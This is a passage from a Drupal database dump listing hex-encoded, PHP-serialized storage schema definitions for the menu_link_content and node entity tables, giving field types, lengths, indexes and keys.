e6b5f636f6e74656e745f5f656e61626c65645f62756e646c65223b613a333a7b693a303b733a373a22656e61626c6564223b693a313b733a363a2262756e646c65223b693a323b733a323a226964223b7d7d7d733a33323a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a323a7b733a31313a227072696d617279206b6579223b613a323a7b693a303b733a31313a227265766973696f6e5f6964223b693a313b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a313a7b733a34393a226d656e755f6c696e6b5f636f6e74656e745f5f69645f5f64656661756c745f6c616e67636f64655f5f6c616e67636f6465223b613a333a7b693a303b733a323a226964223b693a313b733a31363a2264656661756c745f6c616e67636f6465223b693a323b733a383a226c616e67636f6465223b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.bundle', 0x613a323a7b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a2262756e646c65223b613a343a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a2262756e646c65223b613a343a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.changed', 0x613a323a7b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a373a226368616e676564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a33323a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a373a226368616e676564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.content_translation_created', 0x613a323a7b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a32373a22636f6e74656e745f7472616e736c6174696f6e5f63726561746564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a33323a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a32373a22636f6e74656e745f7472616e736c6174696f6e5f63726561746564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.content_translation_outdated', 0x613a323a7b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a32383a22636f6e74656e745f7472616e736c6174696f6e5f6f75746461746564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a33323a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a32383a22636f6e74656e745f7472616e736c6174696f6e5f6f75746461746564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.content_translation_source', 0x613a323a7b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a32363a22636f6e74656e745f7472616e736c6174696f6e5f736f75726365223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a33323a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a32363a22636f6e74656e745f7472616e736c6174696f6e5f736f75726365223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.content_translation_status', 0x613a323a7b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a32363a22636f6e74656e745f7472616e736c6174696f6e5f737461747573223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a33323a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a32363a22636f6e74656e745f7472616e736c6174696f6e5f737461747573223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.content_translation_uid', 0x613a323a7b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a32333a22636f6e74656e745f7472616e736c6174696f6e5f756964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a313a7b733a32393a226d656e755f6c696e6b5f636f6e74656e745f5f63393734303361353266223b613a313a7b693a303b733a32333a22636f6e74656e745f7472616e736c6174696f6e5f756964223b7d7d7d733a33323a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a323a7b733a363a226669656c6473223b613a313a7b733a32333a22636f6e74656e745f7472616e736c6174696f6e5f756964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a313a7b733a32393a226d656e755f6c696e6b5f636f6e74656e745f5f63393734303361353266223b613a313a7b693a303b733a32333a22636f6e74656e745f7472616e736c6174696f6e5f756964223b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.default_langcode', 0x613a323a7b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a2264656661756c745f6c616e67636f6465223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a33323a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a2264656661756c745f6c616e67636f6465223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.description', 0x613a323a7b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a31313a226465736372697074696f6e223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a33323a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31313a226465736372697074696f6e223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.enabled', 0x613a323a7b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a373a22656e61626c6564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a33323a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a373a22656e61626c6564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.expanded', 0x613a313a7b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a22657870616e646564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.external', 0x613a323a7b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a2265787465726e616c223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a33323a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a2265787465726e616c223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.id', 0x613a343a7b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b613a313a7b733a363a226669656c6473223b613a313a7b733a323a226964223b613a343a7b733a343a2274797065223b733a363a2273657269616c223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a323a226964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32363a226d656e755f6c696e6b5f636f6e74656e745f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a323a226964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a33323a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a323a226964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.langcode', 0x613a343a7b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32363a226d656e755f6c696e6b5f636f6e74656e745f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a33323a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.link', 0x613a323a7b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a323a7b733a363a226669656c6473223b613a333a7b733a393a226c696e6b5f5f757269223b613a343a7b733a31313a226465736372697074696f6e223b733a32303a2254686520555249206f6620746865206c696e6b2e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a323034383b733a383a226e6f74206e756c6c223b623a303b7d733a31313a226c696e6b5f5f7469746c65223b613a343a7b733a31313a226465736372697074696f6e223b733a31343a22546865206c696e6b20746578742e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a383a226e6f74206e756c6c223b623a303b7d733a31333a226c696e6b5f5f6f7074696f6e73223b613a353a7b733a31313a226465736372697074696f6e223b733a34313a2253657269616c697a6564206172726179206f66206f7074696f6e7320666f7220746865206c696e6b2e223b733a343a2274797065223b733a343a22626c6f62223b733a343a2273697a65223b733a333a22626967223b733a393a2273657269616c697a65223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a313a7b733a33343a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f5f6c696e6b5f5f757269223b613a313a7b693a303b613a323a7b693a303b733a393a226c696e6b5f5f757269223b693a313b693a33303b7d7d7d7d733a33323a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a323a7b733a363a226669656c6473223b613a333a7b733a393a226c696e6b5f5f757269223b613a343a7b733a31313a226465736372697074696f6e223b733a32303a2254686520555249206f6620746865206c696e6b2e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a323034383b733a383a226e6f74206e756c6c223b623a303b7d733a31313a226c696e6b5f5f7469746c65223b613a343a7b733a31313a226465736372697074696f6e223b733a31343a22546865206c696e6b20746578742e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a383a226e6f74206e756c6c223b623a303b7d733a31333a226c696e6b5f5f6f7074696f6e73223b613a353a7b733a31313a226465736372697074696f6e223b733a34313a2253657269616c697a6564206172726179206f66206f7074696f6e7320666f7220746865206c696e6b2e223b733a343a2274797065223b733a343a22626c6f62223b733a343a2273697a65223b733a333a22626967223b733a393a2273657269616c697a65223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a313a7b733a33343a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f5f6c696e6b5f5f757269223b613a313a7b693a303b613a323a7b693a303b733a393a226c696e6b5f5f757269223b693a313b693a33303b7d7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.menu_name', 0x613a313a7b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a393a226d656e755f6e616d65223b613a343a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.parent', 0x613a313a7b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22706172656e74223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.rediscover', 0x613a313a7b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a31303a227265646973636f766572223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.revision_created', 0x613a313a7b733a32363a226d656e755f6c696e6b5f636f6e74656e745f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a227265766973696f6e5f63726561746564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.revision_default', 0x613a313a7b733a32363a226d656e755f6c696e6b5f636f6e74656e745f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a227265766973696f6e5f64656661756c74223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.revision_id', 0x613a343a7b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b613a313a7b733a363a226669656c6473223b613a313a7b733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32363a226d656e755f6c696e6b5f636f6e74656e745f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a363a2273657269616c223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a33323a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.revision_log_message', 0x613a313a7b733a32363a226d656e755f6c696e6b5f636f6e74656e745f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a32303a227265766973696f6e5f6c6f675f6d657373616765223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.revision_translation_affected', 0x613a323a7b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a33323a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.revision_user', 0x613a313a7b733a32363a226d656e755f6c696e6b5f636f6e74656e745f7265766973696f6e223b613a323a7b733a363a226669656c6473223b613a313a7b733a31333a227265766973696f6e5f75736572223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a313a7b733a32393a226d656e755f6c696e6b5f636f6e74656e745f5f65663032396131383937223b613a313a7b693a303b733a31333a227265766973696f6e5f75736572223b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.title', 0x613a323a7b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a353a227469746c65223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a33323a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a353a227469746c65223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.uuid', 0x613a313a7b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b613a323a7b733a363a226669656c6473223b613a313a7b733a343a2275756964223b613a343a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a22756e69717565206b657973223b613a313a7b733a33363a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f5f757569645f5f76616c7565223b613a313a7b693a303b733a343a2275756964223b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.field_schema_data.weight', 0x613a313a7b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22776569676874223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a303b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'node.entity_schema_data', 0x613a343a7b733a343a226e6f6465223b613a323a7b733a31313a227072696d617279206b6579223b613a313a7b693a303b733a333a226e6964223b7d733a31313a22756e69717565206b657973223b613a313a7b733a393a226e6f64655f5f766964223b613a313a7b693a303b733a333a22766964223b7d7d7d733a31333a226e6f64655f7265766973696f6e223b613a323a7b733a31313a227072696d617279206b6579223b613a313a7b693a303b733a333a22766964223b7d733a373a22696e6465786573223b613a313a7b733a393a226e6f64655f5f6e6964223b613a313a7b693a303b733a333a226e6964223b7d7d7d733a31353a226e6f64655f6669656c645f64617461223b613a323a7b733a31313a227072696d617279206b6579223b613a323a7b693a303b733a333a226e6964223b693a313b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a353a7b733a33363a226e6f64655f5f69645f5f64656661756c745f6c616e67636f64655f5f6c616e67636f6465223b613a333a7b693a303b733a333a226e6964223b693a313b733a31363a2264656661756c745f6c616e67636f6465223b693a323b733a383a226c616e67636f6465223b7d733a393a226e6f64655f5f766964223b613a313a7b693a303b733a333a22766964223b7d733a31373a226e6f64655f5f7374617475735f74797065223b613a333a7b693a303b733a363a22737461747573223b693a313b733a343a2274797065223b693a323b733a333a226e6964223b7d733a31353a226e6f64655f5f66726f6e7470616765223b613a343a7b693a303b733a373a2270726f6d6f7465223b693a313b733a363a22737461747573223b693a323b733a363a22737469636b79223b693a333b733a373a2263726561746564223b7d733a31363a226e6f64655f5f7469746c655f74797065223b613a323a7b693a303b733a353a227469746c65223b693a313b613a323a7b693a303b733a343a2274797065223b693a313b693a343b7d7d7d7d733a31393a226e6f64655f6669656c645f7265766973696f6e223b613a323a7b733a31313a227072696d617279206b6579223b613a323a7b693a303b733a333a22766964223b693a313b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a313a7b733a33363a226e6f64655f5f69645f5f64656661756c745f6c616e67636f64655f5f6c616e67636f6465223b613a333a7b693a303b733a333a226e6964223b693a313b733a31363a2264656661756c745f6c616e67636f6465223b693a323b733a383a226c616e67636f6465223b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.body', 0x613a323a7b733a31303a226e6f64655f5f626f6479223b613a343a7b733a31313a226465736372697074696f6e223b733a33333a22446174612073746f7261676520666f72206e6f6465206669656c6420626f64792e223b733a363a226669656c6473223b613a393a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a31303a22626f64795f76616c7565223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a313b7d733a31323a22626f64795f73756d6d617279223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a303b7d733a31313a22626f64795f666f726d6174223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3235353b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a31313a22626f64795f666f726d6174223b613a313a7b693a303b733a31313a22626f64795f666f726d6174223b7d7d7d733a31393a226e6f64655f7265766973696f6e5f5f626f6479223b613a343a7b733a31313a226465736372697074696f6e223b733a34353a225265766973696f6e20617263686976652073746f7261676520666f72206e6f6465206669656c6420626f64792e223b733a363a226669656c6473223b613a393a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a31303a22626f64795f766